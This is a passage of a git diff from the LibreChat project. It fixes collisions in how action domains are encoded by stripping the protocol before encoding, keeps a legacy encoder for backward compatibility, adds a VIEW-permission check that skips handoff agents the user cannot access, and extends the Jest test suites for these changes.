@@ -79,23 +110,27 @@ async function domainParser(domain, inverse = false) { if (!domain) { return; } - const domainsCache = getLogStores(CacheKeys.ENCODED_DOMAINS); - const cachedDomain = await domainsCache.get(domain); - if (inverse && cachedDomain) { - return domain; - } - if (inverse && domain.length <= Constants.ENCODED_DOMAIN_LENGTH) { - return domain.replace(/\./g, actionDomainSeparator); - } + const domainsCache = getLogStores(CacheKeys.ENCODED_DOMAINS); if (inverse) { - const modifiedDomain = Buffer.from(domain).toString('base64'); + const hostname = stripProtocol(domain); + const cachedDomain = await domainsCache.get(hostname); + if (cachedDomain) { + return hostname; + } + + if (hostname.length <= Constants.ENCODED_DOMAIN_LENGTH) { + return hostname.replace(/\./g, actionDomainSeparator); + } + + const modifiedDomain = Buffer.from(hostname).toString('base64'); const key = modifiedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH); await domainsCache.set(key, modifiedDomain); return key; } + const cachedDomain = await domainsCache.get(domain); if (!cachedDomain) { return domain.replace(replaceSeparatorRegex, '.'); } @@ -456,6 +491,7 @@ const deleteAssistantActions = async ({ req, assistant_id }) => { module.exports = { deleteAssistantActions, validateAndUpdateTool, + legacyDomainEncode, createActionTool, encryptMetadata, decryptMetadata, diff --git a/api/server/services/ActionService.spec.js b/api/server/services/ActionService.spec.js index c60aef7ad1..42def44b4f 100644 --- a/api/server/services/ActionService.spec.js +++ b/api/server/services/ActionService.spec.js @@ -1,175 +1,539 @@ -const { Constants, actionDomainSeparator } = require('librechat-data-provider'); -const { domainParser } = require('./ActionService'); +const { Constants, actionDelimiter, actionDomainSeparator } = require('librechat-data-provider'); +const { domainParser, legacyDomainEncode, validateAndUpdateTool } = require('./ActionService'); jest.mock('keyv'); -const globalCache = {}; 
+jest.mock('~/models/Action', () => ({ + getActions: jest.fn(), + deleteActions: jest.fn(), +})); + +const { getActions } = require('~/models/Action'); + +let mockDomainCache = {}; jest.mock('~/cache/getLogStores', () => { - return jest.fn().mockImplementation(() => { - const EventEmitter = require('events'); - const { CacheKeys } = require('librechat-data-provider'); + return jest.fn().mockImplementation(() => ({ + get: async (key) => mockDomainCache[key] ?? null, + set: async (key, value) => { + mockDomainCache[key] = value; + return true; + }, + })); +}); - class KeyvMongo extends EventEmitter { - constructor(url = 'mongodb://127.0.0.1:27017', options) { - super(); - this.ttlSupport = false; - url = url ?? {}; - if (typeof url === 'string') { - url = { url }; - } - if (url.uri) { - url = { url: url.uri, ...url }; - } - this.opts = { - url, - collection: 'keyv', - ...url, - ...options, - }; - } +beforeEach(() => { + mockDomainCache = {}; + getActions.mockReset(); +}); - get = async (key) => { - return new Promise((resolve) => { - resolve(globalCache[key] || null); - }); - }; +const SEP = actionDomainSeparator; +const DELIM = actionDelimiter; +const MAX = Constants.ENCODED_DOMAIN_LENGTH; +const domainSepRegex = new RegExp(SEP, 'g'); - set = async (key, value) => { - return new Promise((resolve) => { - globalCache[key] = value; - resolve(true); - }); - }; - } +describe('domainParser', () => { + describe('nullish input', () => { + it.each([null, undefined, ''])('returns undefined for %j', async (input) => { + expect(await domainParser(input, true)).toBeUndefined(); + expect(await domainParser(input, false)).toBeUndefined(); + }); + }); - return new KeyvMongo('', { - namespace: CacheKeys.ENCODED_DOMAINS, - ttl: 0, + describe('short-path encoding (hostname ≤ threshold)', () => { + it.each([ + ['examp.com', `examp${SEP}com`], + ['swapi.tech', `swapi${SEP}tech`], + ['a.b', `a${SEP}b`], + ])('replaces dots in %s → %s', async (domain, expected) => { + expect(await 
domainParser(domain, true)).toBe(expected); + }); + + it('handles domain exactly at threshold length', async () => { + const domain = 'a'.repeat(MAX - 4) + '.com'; + expect(domain).toHaveLength(MAX); + const result = await domainParser(domain, true); + expect(result).toBe(domain.replace(/\./g, SEP)); + }); + }); + + describe('base64-path encoding (hostname > threshold)', () => { + it('produces a key of exactly ENCODED_DOMAIN_LENGTH chars', async () => { + const result = await domainParser('api.example.com', true); + expect(result).toHaveLength(MAX); + }); + + it('encodes hostname, not full URL', async () => { + const hostname = 'api.example.com'; + const expectedKey = Buffer.from(hostname).toString('base64').substring(0, MAX); + expect(await domainParser(hostname, true)).toBe(expectedKey); + }); + + it('populates decode cache for round-trip', async () => { + const hostname = 'longdomainname.com'; + const key = await domainParser(hostname, true); + + expect(mockDomainCache[key]).toBe(Buffer.from(hostname).toString('base64')); + expect(await domainParser(key, false)).toBe(hostname); + }); + }); + + describe('protocol stripping', () => { + it('https:// URL and bare hostname produce identical encoding', async () => { + const encoded = await domainParser('https://swapi.tech', true); + expect(encoded).toBe(await domainParser('swapi.tech', true)); + expect(encoded).toBe(`swapi${SEP}tech`); + }); + + it('http:// URL and bare hostname produce identical encoding', async () => { + const encoded = await domainParser('http://api.example.com', true); + expect(encoded).toBe(await domainParser('api.example.com', true)); + }); + + it('different https:// domains produce unique keys', async () => { + const keys = await Promise.all([ + domainParser('https://api.example.com', true), + domainParser('https://api.weather.com', true), + domainParser('https://data.github.com', true), + ]); + const unique = new Set(keys); + expect(unique.size).toBe(keys.length); + }); + + it('long hostname 
after stripping still uses base64 path', async () => { + const result = await domainParser('https://api.example.com', true); + expect(result).toHaveLength(MAX); + expect(result).not.toContain(SEP); + }); + + it('short hostname after stripping uses dot-replacement path', async () => { + const result = await domainParser('https://a.b.c', true); + expect(result).toBe(`a${SEP}b${SEP}c`); + }); + + it('strips path and query from full URL before encoding', async () => { + const result = await domainParser('https://api.example.com/v1/endpoint?foo=bar', true); + expect(result).toBe(await domainParser('api.example.com', true)); + }); + }); + + describe('unicode domains', () => { + it('encodes unicode hostname via base64 path', async () => { + const domain = 'täst.example.com'; + const result = await domainParser(domain, true); + expect(result).toHaveLength(MAX); + expect(result).toBe(Buffer.from(domain).toString('base64').substring(0, MAX)); + }); + + it('round-trips unicode hostname through encode then decode', async () => { + const domain = 'täst.example.com'; + const key = await domainParser(domain, true); + expect(await domainParser(key, false)).toBe(domain); + }); + + it('strips protocol before encoding unicode hostname', async () => { + const withProto = 'https://täst.example.com'; + const bare = 'täst.example.com'; + expect(await domainParser(withProto, true)).toBe(await domainParser(bare, true)); + }); + }); + + describe('decode path', () => { + it('short-path encoded domain decodes via separator replacement', async () => { + expect(await domainParser(`examp${SEP}com`, false)).toBe('examp.com'); + }); + + it('base64-path encoded domain decodes via cache lookup', async () => { + const hostname = 'api.example.com'; + const key = await domainParser(hostname, true); + expect(await domainParser(key, false)).toBe(hostname); + }); + + it('returns input unchanged for unknown non-separator strings', async () => { + expect(await domainParser('not_base64_encoded', 
false)).toBe('not_base64_encoded'); + }); + + it('returns a string without throwing for corrupt cache entries', async () => { + mockDomainCache['corrupt_key'] = '!!!'; + const result = await domainParser('corrupt_key', false); + expect(typeof result).toBe('string'); }); }); }); -describe('domainParser', () => { - const TLD = '.com'; - - // Non-azure request - it('does not return domain as is if not azure', async () => { - const domain = `example.com${actionDomainSeparator}test${actionDomainSeparator}`; - const result1 = await domainParser(domain, false); - const result2 = await domainParser(domain, true); - expect(result1).not.toEqual(domain); - expect(result2).not.toEqual(domain); +describe('legacyDomainEncode', () => { + it.each(['', null, undefined])('returns empty string for %j', (input) => { + expect(legacyDomainEncode(input)).toBe(''); }); - // Test for Empty or Null Inputs - it('returns undefined for null domain input', async () => { - const result = await domainParser(null, true); - expect(result).toBeUndefined(); + it('is synchronous (returns a string, not a Promise)', () => { + const result = legacyDomainEncode('examp.com'); + expect(result).toBe(`examp${SEP}com`); + expect(result).not.toBeInstanceOf(Promise); }); - it('returns undefined for empty domain input', async () => { - const result = await domainParser('', true); - expect(result).toBeUndefined(); + it('uses dot-replacement for short domains', () => { + expect(legacyDomainEncode('examp.com')).toBe(`examp${SEP}com`); }); - // Verify Correct Caching Behavior - it('caches encoded domain correctly', async () => { - const domain = 'longdomainname.com'; - const encodedDomain = Buffer.from(domain) - .toString('base64') - .substring(0, Constants.ENCODED_DOMAIN_LENGTH); - - await domainParser(domain, true); - - const cachedValue = await globalCache[encodedDomain]; - expect(cachedValue).toEqual(Buffer.from(domain).toString('base64')); + it('uses base64 prefix of full input for long domains', () => { + const 
domain = 'https://swapi.tech'; + const expected = Buffer.from(domain).toString('base64').substring(0, MAX); + expect(legacyDomainEncode(domain)).toBe(expected); }); - // Test for Edge Cases Around Length Threshold - it('encodes domain exactly at threshold without modification', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH - TLD.length) + TLD; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); + it('all https:// URLs collide to the same key', () => { + const results = [ + legacyDomainEncode('https://api.example.com'), + legacyDomainEncode('https://api.weather.com'), + legacyDomainEncode('https://totally.different.host'), + ]; + expect(new Set(results).size).toBe(1); }); - it('encodes domain just below threshold without modification', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH - 1 - TLD.length) + TLD; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); + it('matches what old domainParser would have produced', () => { + const domain = 'https://api.example.com'; + const legacy = legacyDomainEncode(domain); + expect(legacy).toBe(Buffer.from(domain).toString('base64').substring(0, MAX)); }); - // Test for Unicode Domain Names - it('handles unicode characters in domain names correctly when encoding', async () => { - const unicodeDomain = 'täst.example.com'; - const encodedDomain = Buffer.from(unicodeDomain) - .toString('base64') - .substring(0, Constants.ENCODED_DOMAIN_LENGTH); - const result = await domainParser(unicodeDomain, true); - expect(result).toEqual(encodedDomain); - }); - - it('decodes unicode domain names correctly', async () => { - const unicodeDomain = 'täst.example.com'; - const encodedDomain = Buffer.from(unicodeDomain).toString('base64'); - globalCache[encodedDomain.substring(0, 
Constants.ENCODED_DOMAIN_LENGTH)] = encodedDomain; // Simulate caching - - const result = await domainParser( - encodedDomain.substring(0, Constants.ENCODED_DOMAIN_LENGTH), - false, - ); - expect(result).toEqual(unicodeDomain); - }); - - // Core Functionality Tests - it('returns domain with replaced separators if no cached domain exists', async () => { - const domain = 'example.com'; - const withSeparator = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(withSeparator, false); - expect(result).toEqual(domain); - }); - - it('returns domain with replaced separators when inverse is false and under encoding length', async () => { - const domain = 'examp.com'; - const withSeparator = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(withSeparator, false); - expect(result).toEqual(domain); - }); - - it('replaces periods with actionDomainSeparator when inverse is true and under encoding length', async () => { - const domain = 'examp.com'; - const expected = domain.replace(/\./g, actionDomainSeparator); - const result = await domainParser(domain, true); - expect(result).toEqual(expected); - }); - - it('encodes domain when length is above threshold and inverse is true', async () => { - const domain = 'a'.repeat(Constants.ENCODED_DOMAIN_LENGTH + 1).concat('.com'); - const result = await domainParser(domain, true); - expect(result).not.toEqual(domain); - expect(result.length).toBeLessThanOrEqual(Constants.ENCODED_DOMAIN_LENGTH); - }); - - it('returns encoded value if no encoded value is cached, and inverse is false', async () => { - const originalDomain = 'example.com'; - const encodedDomain = Buffer.from( - originalDomain.replace(/\./g, actionDomainSeparator), - ).toString('base64'); - const result = await domainParser(encodedDomain, false); - expect(result).toEqual(encodedDomain); - }); - - it('decodes encoded value if cached and encoded value is provided, and inverse is false', async () => { - const 
originalDomain = 'example.com'; - const encodedDomain = await domainParser(originalDomain, true); - const result = await domainParser(encodedDomain, false); - expect(result).toEqual(originalDomain); - }); - - it('handles invalid base64 encoded values gracefully', async () => { - const invalidBase64Domain = 'not_base64_encoded'; - const result = await domainParser(invalidBase64Domain, false); - expect(result).toEqual(invalidBase64Domain); + it('produces same result as new domainParser for short bare hostnames', async () => { + const domain = 'swapi.tech'; + expect(legacyDomainEncode(domain)).toBe(await domainParser(domain, true)); + }); +}); + +describe('validateAndUpdateTool', () => { + const mockReq = { user: { id: 'user123' } }; + + it('returns tool unchanged when name passes tool-name regex', async () => { + const tool = { function: { name: 'getPeople_action_swapi---tech' } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + expect(result).toEqual(tool); + expect(getActions).not.toHaveBeenCalled(); + }); + + it('matches action when metadata.domain has https:// prefix and tool domain is bare hostname', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'https://api.example.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).not.toBeNull(); + expect(result.function.name).toMatch(/^getPeople_action_/); + expect(result.function.name).not.toContain('.'); + }); + + it('matches action when metadata.domain has no protocol', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'api.example.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).not.toBeNull(); + 
expect(result.function.name).toMatch(/^getPeople_action_/); + }); + + it('returns null when no action matches the domain', async () => { + getActions.mockResolvedValue([{ metadata: { domain: 'https://other.domain.com' } }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).toBeNull(); + }); + + it('returns null when action has no metadata', async () => { + getActions.mockResolvedValue([{ metadata: null }]); + + const tool = { function: { name: `getPeople${DELIM}api.example.com` } }; + const result = await validateAndUpdateTool({ + req: mockReq, + tool, + assistant_id: 'asst_1', + }); + + expect(result).toBeNull(); + }); +}); + +describe('backward-compatible tool name matching', () => { + function normalizeToolName(name) { + return name.replace(domainSepRegex, '_'); + } + + function buildToolName(functionName, encodedDomain) { + return `${functionName}${DELIM}${encodedDomain}`; + } + + describe('definition-phase matching', () => { + it('new encoding matches agent tools stored with new encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const encoded = await domainParser(metadataDomain, true); + const normalized = normalizeToolName(encoded); + + const storedTool = buildToolName('getPeople', encoded); + const defToolName = `getPeople${DELIM}${normalized}`; + + expect(normalizeToolName(storedTool)).toBe(defToolName); + }); + + it('legacy encoding matches agent tools stored with legacy encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const legacy = legacyDomainEncode(metadataDomain); + const legacyNormalized = normalizeToolName(legacy); + + const storedTool = buildToolName('getPeople', legacy); + const legacyDefName = `getPeople${DELIM}${legacyNormalized}`; + + expect(normalizeToolName(storedTool)).toBe(legacyDefName); + }); + + it('new definition matches old stored tools via 
legacy fallback', async () => { + const metadataDomain = 'https://swapi.tech'; + const newDomain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const newNorm = normalizeToolName(newDomain); + const legacyNorm = normalizeToolName(legacyDomain); + + const oldStoredTool = buildToolName('getPeople', legacyDomain); + const newToolName = `getPeople${DELIM}${newNorm}`; + const legacyToolName = `getPeople${DELIM}${legacyNorm}`; + + const storedNormalized = normalizeToolName(oldStoredTool); + const hasMatch = storedNormalized === newToolName || storedNormalized === legacyToolName; + expect(hasMatch).toBe(true); + }); + + it('pre-normalized Set eliminates per-tool normalization', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const normalizedDomain = normalizeToolName(domain); + const legacyNormalized = normalizeToolName(legacyDomain); + + const storedTools = [ + buildToolName('getWeather', legacyDomain), + buildToolName('getForecast', domain), + ]; + + const preNormalized = new Set(storedTools.map((t) => normalizeToolName(t))); + + const toolName = `getWeather${DELIM}${normalizedDomain}`; + const legacyToolName = `getWeather${DELIM}${legacyNormalized}`; + expect(preNormalized.has(toolName) || preNormalized.has(legacyToolName)).toBe(true); + }); + }); + + describe('execution-phase tool lookup', () => { + it('model-called tool name resolves via normalizedToDomain map (new encoding)', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const normalized = normalizeToolName(domain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(normalized, domain); + + const modelToolName = `getWeather${DELIM}${normalized}`; + + let matched = ''; + for (const [norm, canonical] of 
normalizedToDomain.entries()) { + if (modelToolName.includes(norm)) { + matched = canonical; + break; + } + } + + expect(matched).toBe(domain); + + const functionName = modelToolName.replace(`${DELIM}${normalizeToolName(matched)}`, ''); + expect(functionName).toBe('getWeather'); + }); + + it('model-called tool name resolves via legacy entry in normalizedToDomain map', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + const legacyNorm = normalizeToolName(legacyDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(normalizeToolName(domain), domain); + normalizedToDomain.set(legacyNorm, domain); + + const legacyModelToolName = `getWeather${DELIM}${legacyNorm}`; + + let matched = ''; + for (const [norm, canonical] of normalizedToDomain.entries()) { + if (legacyModelToolName.includes(norm)) { + matched = canonical; + break; + } + } + + expect(matched).toBe(domain); + }); + + it('legacy guard skips duplicate map entry for short bare hostnames', async () => { + const domain = 'swapi.tech'; + const newEncoding = await domainParser(domain, true); + const legacyEncoding = legacyDomainEncode(domain); + + expect(newEncoding).toBe(legacyEncoding); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(newEncoding, newEncoding); + if (legacyEncoding !== newEncoding) { + normalizedToDomain.set(legacyEncoding, newEncoding); + } + expect(normalizedToDomain.size).toBe(1); + }); + }); + + describe('processRequiredActions matching (assistants path)', () => { + it('legacy tool from OpenAI matches via normalizedToDomain with both encodings', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(domain, domain); + if (legacyDomain 
!== domain) { + normalizedToDomain.set(legacyDomain, domain); + } + + const legacyToolName = buildToolName('getPeople', legacyDomain); + + let currentDomain = ''; + let matchedKey = ''; + for (const [key, canonical] of normalizedToDomain.entries()) { + if (legacyToolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; + break; + } + } + + expect(currentDomain).toBe(domain); + expect(matchedKey).toBe(legacyDomain); + + const functionName = legacyToolName.replace(`${DELIM}${matchedKey}`, ''); + expect(functionName).toBe('getPeople'); + }); + + it('new tool name matches via the canonical domain key', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const normalizedToDomain = new Map(); + normalizedToDomain.set(domain, domain); + if (legacyDomain !== domain) { + normalizedToDomain.set(legacyDomain, domain); + } + + const newToolName = buildToolName('getPeople', domain); + + let currentDomain = ''; + let matchedKey = ''; + for (const [key, canonical] of normalizedToDomain.entries()) { + if (newToolName.includes(key)) { + currentDomain = canonical; + matchedKey = key; + break; + } + } + + expect(currentDomain).toBe(domain); + expect(matchedKey).toBe(domain); + + const functionName = newToolName.replace(`${DELIM}${matchedKey}`, ''); + expect(functionName).toBe('getPeople'); + }); + }); + + describe('save-route cleanup', () => { + it('tool filter removes tools matching new encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const tools = [ + buildToolName('getPeople', domain), + buildToolName('unrelated', 'other---domain'), + ]; + + const filtered = tools.filter((t) => !t.includes(domain) && !t.includes(legacyDomain)); + + expect(filtered).toEqual([buildToolName('unrelated', 
'other---domain')]); + }); + + it('tool filter removes tools matching legacy encoding', async () => { + const metadataDomain = 'https://swapi.tech'; + const domain = await domainParser(metadataDomain, true); + const legacyDomain = legacyDomainEncode(metadataDomain); + + const tools = [ + buildToolName('getPeople', legacyDomain), + buildToolName('unrelated', 'other---domain'), + ]; + + const filtered = tools.filter((t) => !t.includes(domain) && !t.includes(legacyDomain)); + + expect(filtered).toEqual([buildToolName('unrelated', 'other---domain')]); + }); + }); + + describe('delete-route domain extraction', () => { + it('domain extracted from actions array is usable as-is for tool filtering', async () => { + const metadataDomain = 'https://api.example.com'; + const domain = await domainParser(metadataDomain, true); + const actionId = 'abc123'; + const actionEntry = `${domain}${DELIM}${actionId}`; + + const [storedDomain] = actionEntry.split(DELIM); + expect(storedDomain).toBe(domain); + + const tools = [buildToolName('getWeather', domain), buildToolName('getPeople', 'other')]; + + const filtered = tools.filter((t) => !t.includes(storedDomain)); + expect(filtered).toEqual([buildToolName('getPeople', 'other')]); + }); + }); + + describe('multi-action agents (collision scenario)', () => { + it('two https:// actions now produce distinct tool names', async () => { + const domain1 = await domainParser('https://api.weather.com', true); + const domain2 = await domainParser('https://api.spacex.com', true); + + const tool1 = buildToolName('getData', domain1); + const tool2 = buildToolName('getData', domain2); + + expect(tool1).not.toBe(tool2); + }); + + it('two https:// actions used to collide in legacy encoding', () => { + const legacy1 = legacyDomainEncode('https://api.weather.com'); + const legacy2 = legacyDomainEncode('https://api.spacex.com'); + + const tool1 = buildToolName('getData', legacy1); + const tool2 = buildToolName('getData', legacy2); + + 
expect(tool1).toBe(tool2); + }); }); }); diff --git a/api/server/services/Endpoints/agents/addedConvo.js b/api/server/services/Endpoints/agents/addedConvo.js index 25b1327991..11b87e450e 100644 --- a/api/server/services/Endpoints/agents/addedConvo.js +++ b/api/server/services/Endpoints/agents/addedConvo.js @@ -1,6 +1,7 @@ const { logger } = require('@librechat/data-schemas'); const { initializeAgent, validateAgentModel } = require('@librechat/api'); const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { getConvoFiles } = require('~/models/Conversation'); const { getAgent } = require('~/models/Agent'); const db = require('~/models'); @@ -108,6 +109,7 @@ const processAddedConvo = async ({ getUserKeyValues: db.getUserKeyValues, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); diff --git a/api/server/services/Endpoints/agents/initialize.js b/api/server/services/Endpoints/agents/initialize.js index e71270ef85..08f631c3d2 100644 --- a/api/server/services/Endpoints/agents/initialize.js +++ b/api/server/services/Endpoints/agents/initialize.js @@ -10,6 +10,8 @@ const { createSequentialChainEdges, } = require('@librechat/api'); const { + ResourceType, + PermissionBits, EModelEndpoint, isAgentsEndpoint, getResponseSender, @@ -20,7 +22,9 @@ const { getDefaultHandlers, } = require('~/server/controllers/agents/callbacks'); const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService'); +const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions'); const { getModelsConfig } = require('~/server/controllers/ModelController'); +const { checkPermission } = require('~/server/services/PermissionService'); const AgentClient = require('~/server/controllers/agents/client'); const { getConvoFiles } = require('~/models/Conversation'); 
const { processAddedConvo } = require('./addedConvo'); @@ -125,6 +129,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: ctx.toolRegistry, userMCPAuthMap: ctx.userMCPAuthMap, tool_resources: ctx.tool_resources, + actionsEnabled: ctx.actionsEnabled, }); logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`); @@ -200,6 +205,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { getUserCodeFiles: db.getUserCodeFiles, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); @@ -211,6 +217,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: primaryConfig.toolRegistry, userMCPAuthMap: primaryConfig.userMCPAuthMap, tool_resources: primaryConfig.tool_resources, + actionsEnabled: primaryConfig.actionsEnabled, }); const agent_ids = primaryConfig.agent_ids; @@ -229,6 +236,22 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { return null; } + const hasAccess = await checkPermission({ + userId: req.user.id, + role: req.user.role, + resourceType: ResourceType.AGENT, + resourceId: agent._id, + requiredPermission: PermissionBits.VIEW, + }); + + if (!hasAccess) { + logger.warn( + `[processAgent] User ${req.user.id} lacks VIEW access to handoff agent ${agentId}, skipping`, + ); + skippedAgentIds.add(agentId); + return null; + } + const validationResult = await validateAgentModel({ req, res, @@ -263,6 +286,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { getUserCodeFiles: db.getUserCodeFiles, getToolFilesByIds: db.getToolFilesByIds, getCodeGeneratedFiles: db.getCodeGeneratedFiles, + filterFilesByAgentAccess, }, ); @@ -278,6 +302,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { toolRegistry: config.toolRegistry, userMCPAuthMap: config.userMCPAuthMap, tool_resources: config.tool_resources, + 
actionsEnabled: config.actionsEnabled, }); agentConfigs.set(agentId, config); @@ -351,6 +376,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => { userMCPAuthMap = updatedMCPAuthMap; } + for (const [agentId, config] of agentConfigs) { + if (agentToolContexts.has(agentId)) { + continue; + } + agentToolContexts.set(agentId, { + agent: config, + toolRegistry: config.toolRegistry, + userMCPAuthMap: config.userMCPAuthMap, + tool_resources: config.tool_resources, + actionsEnabled: config.actionsEnabled, + }); + } + // Ensure edges is an array when we have multiple agents (multi-agent mode) // MultiAgentGraph.categorizeEdges requires edges to be iterable if (agentConfigs.size > 0 && !edges) { diff --git a/api/server/services/Endpoints/agents/initialize.spec.js b/api/server/services/Endpoints/agents/initialize.spec.js new file mode 100644 index 0000000000..16b41aca65 --- /dev/null +++ b/api/server/services/Endpoints/agents/initialize.spec.js @@ -0,0 +1,201 @@ +const mongoose = require('mongoose'); +const { + ResourceType, + PermissionBits, + PrincipalType, + PrincipalModel, +} = require('librechat-data-provider'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +const mockInitializeAgent = jest.fn(); +const mockValidateAgentModel = jest.fn(); + +jest.mock('@librechat/agents', () => ({ + ...jest.requireActual('@librechat/agents'), + createContentAggregator: jest.fn(() => ({ + contentParts: [], + aggregateContent: jest.fn(), + })), +})); + +jest.mock('@librechat/api', () => ({ + ...jest.requireActual('@librechat/api'), + initializeAgent: (...args) => mockInitializeAgent(...args), + validateAgentModel: (...args) => mockValidateAgentModel(...args), + GenerationJobManager: { setCollectedUsage: jest.fn() }, + getCustomEndpointConfig: jest.fn(), + createSequentialChainEdges: jest.fn(), +})); + +jest.mock('~/server/controllers/agents/callbacks', () => ({ + createToolEndCallback: jest.fn(() => jest.fn()), + getDefaultHandlers: 
jest.fn(() => ({})), +})); + +jest.mock('~/server/services/ToolService', () => ({ + loadAgentTools: jest.fn(), + loadToolsForExecution: jest.fn(), +})); + +jest.mock('~/server/controllers/ModelController', () => ({ + getModelsConfig: jest.fn().mockResolvedValue({}), +})); + +let agentClientArgs; +jest.mock('~/server/controllers/agents/client', () => { + return jest.fn().mockImplementation((args) => { + agentClientArgs = args; + return {}; + }); +}); + +jest.mock('./addedConvo', () => ({ + processAddedConvo: jest.fn().mockResolvedValue({ userMCPAuthMap: undefined }), +})); + +jest.mock('~/cache', () => ({ + logViolation: jest.fn(), +})); + +const { initializeClient } = require('./initialize'); +const { createAgent } = require('~/models/Agent'); +const { User, AclEntry } = require('~/db/models'); + +const PRIMARY_ID = 'agent_primary'; +const TARGET_ID = 'agent_target'; +const AUTHORIZED_ID = 'agent_authorized'; + +describe('initializeClient — processAgent ACL gate', () => { + let mongoServer; + let testUser; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + await mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await mongoose.connection.dropDatabase(); + jest.clearAllMocks(); + agentClientArgs = undefined; + + testUser = await User.create({ + email: 'test@example.com', + name: 'Test User', + username: 'testuser', + role: 'USER', + }); + + mockValidateAgentModel.mockResolvedValue({ isValid: true }); + }); + + const makeReq = () => ({ + user: { id: testUser._id.toString(), role: 'USER' }, + body: { conversationId: 'conv_1', files: [] }, + config: { endpoints: {} }, + _resumableStreamId: null, + }); + + const makeEndpointOption = () => ({ + agent: Promise.resolve({ + id: PRIMARY_ID, + name: 'Primary', + provider: 'openai', + model: 'gpt-4', + tools: [], + }), + model_parameters: { model: 'gpt-4' }, + endpoint: 'agents', + 
}); + + const makePrimaryConfig = (edges) => ({ + id: PRIMARY_ID, + endpoint: 'agents', + edges, + toolDefinitions: [], + toolRegistry: new Map(), + userMCPAuthMap: null, + tool_resources: {}, + resendFiles: true, + maxContextTokens: 4096, + }); + + it('should skip handoff agent and filter its edge when user lacks VIEW access', async () => { + await createAgent({ + id: TARGET_ID, + name: 'Target Agent', + provider: 'openai', + model: 'gpt-4', + author: new mongoose.Types.ObjectId(), + tools: [], + }); + + const edges = [{ from: PRIMARY_ID, to: TARGET_ID, edgeType: 'handoff' }]; + mockInitializeAgent.mockResolvedValue(makePrimaryConfig(edges)); + + await initializeClient({ + req: makeReq(), + res: {}, + signal: new AbortController().signal, + endpointOption: makeEndpointOption(), + }); + + expect(mockInitializeAgent).toHaveBeenCalledTimes(1); + expect(agentClientArgs.agent.edges).toEqual([]); + }); + + it('should initialize handoff agent and keep its edge when user has VIEW access', async () => { + const authorizedAgent = await createAgent({ + id: AUTHORIZED_ID, + name: 'Authorized Agent', + provider: 'openai', + model: 'gpt-4', + author: new mongoose.Types.ObjectId(), + tools: [], + }); + + await AclEntry.create({ + principalType: PrincipalType.USER, + principalId: testUser._id, + principalModel: PrincipalModel.USER, + resourceType: ResourceType.AGENT, + resourceId: authorizedAgent._id, + permBits: PermissionBits.VIEW, + grantedBy: testUser._id, + }); + + const edges = [{ from: PRIMARY_ID, to: AUTHORIZED_ID, edgeType: 'handoff' }]; + const handoffConfig = { + id: AUTHORIZED_ID, + edges: [], + toolDefinitions: [], + toolRegistry: new Map(), + userMCPAuthMap: null, + tool_resources: {}, + }; + + let callCount = 0; + mockInitializeAgent.mockImplementation(() => { + 